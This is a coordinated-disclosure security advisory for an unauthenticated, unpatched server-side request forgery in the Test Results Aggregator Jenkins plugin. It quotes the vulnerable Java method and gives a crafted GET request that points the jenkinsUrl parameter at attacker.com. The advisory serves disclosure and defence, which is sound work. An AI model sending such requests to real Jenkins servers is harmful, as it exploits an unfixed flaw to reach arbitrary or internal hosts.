Coordinated Disclosure Timeline
- 2023-04-11: Issue reported to the Jenkins Security team.
- 2023-07-12: Advisory published (no fix available).
Summary
A Server-Side Request Forgery (SSRF) vulnerability was found in the test-results-aggregator-plugin. The vulnerability resides in the com.jenkins.testresultsaggregator.TestResultsAggregator#doTestApiConnection method and can be exploited without authentication. An attacker can leverage this vulnerability to send requests to arbitrary hosts.
Product
Test Results Aggregator Jenkins plugin
Tested Version
Details
SSRF in com.jenkins.testresultsaggregator.TestResultsAggregator#doTestApiConnection (GHSL-2023-063)
The doTestApiConnection method in the TestResultsAggregator.java file lacks proper validation and sanitization of user input for the jenkinsUrl parameter, allowing a blind exploitation of a server-side request forgery (SSRF).
Affected source code: TestResultsAggregator.java
public FormValidation doTestApiConnection(@QueryParameter final String jenkinsUrl, @QueryParameter final String username, @QueryParameter final Secret password) {
try {
new Collector(null, username, password, jenkinsUrl).getAPIConnection();
return FormValidation.ok(LocalMessages.SUCCESS.toString());
} catch (Exception e) {
return FormValidation.error(LocalMessages.ERROR_OCCURRED.toString() + ": " + e.getMessage());
}
}
In order to exploit the vulnerability, an attacker may send the following crafted request:
GET /jenkins/descriptorByName/com.jenkins.testresultsaggregator.TestResultsAggregator/testApiConnection?jenkinsUrl=http://attacker.com HTTP/1.1
Host: localhost:8080
Connection: close
This vulnerability was found using CodeQL’s SSRF Java query.
Impact
This issue may lead to server-side request forgery.
Resources
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-063 in any communication regarding this issue.